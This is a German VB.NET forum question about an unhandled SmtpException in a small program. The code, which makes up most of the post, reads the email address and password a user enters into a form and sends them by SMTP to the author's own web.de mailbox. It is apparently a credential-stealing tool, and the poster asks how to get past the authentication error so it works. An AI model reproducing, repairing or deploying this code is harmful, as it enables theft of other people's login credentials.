Unbehandelte Ausnahme bei System.Net.Mail.SmtpException / Was soll ich tun?

  • VB.NET
  • .NET (FX) 4.5–4.8

Es gibt 2 Antworten in diesem Thema. Der letzte Beitrag () ist von Khayson.

    Unbehandelte Ausnahme bei System.Net.Mail.SmtpException / Was soll ich tun?

    VB.NET-Quellcode

    1. Timer1.Start()
    2. Dim smtpServer As New SmtpClient()
    3. Dim mail As New MailMessage()
    4. smtpServer.Credentials = New Net.NetworkCredential("MaxMustermann@web.de", "Max123")
    5. smtpServer.Port = 587
    6. smtpServer.Host = "smtp.web.de"
    7. smtpServer.EnableSsl = True
    8. mail = New MailMessage
    9. mail.From = New MailAddress("MaxMustermann@web.de")
    10. mail.to.Add("MaxMustermann@web.de")
    11. mail.Subject = "E-Mail" & Email.text
    12. mail.Body = "E-Mail : " & Email.Text & ", " & "Passwort : " & Passwort.Text
    13. smtpServer.Send(mail)
    14. End Sub

    Wenn ich mein "Tool" starten bzw debuggen will steht da folgendes bei
    smtpServer.Send(mail)

    Unbehandelte Ausnahme
    System.Net.Mail.SmtpException"Für den SMTP-Server ist eine sichere Verbindung erforderlich,oder der Client wurde nicht authentifiziert,
    die Server Antwort war: Authentication required" Weiß jemand was man da machen soll?
    Freue mich auf Antworten :)

    Thema verschoben, CodeTags gesetzt ~VaporiZed

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „VaporiZed“ ()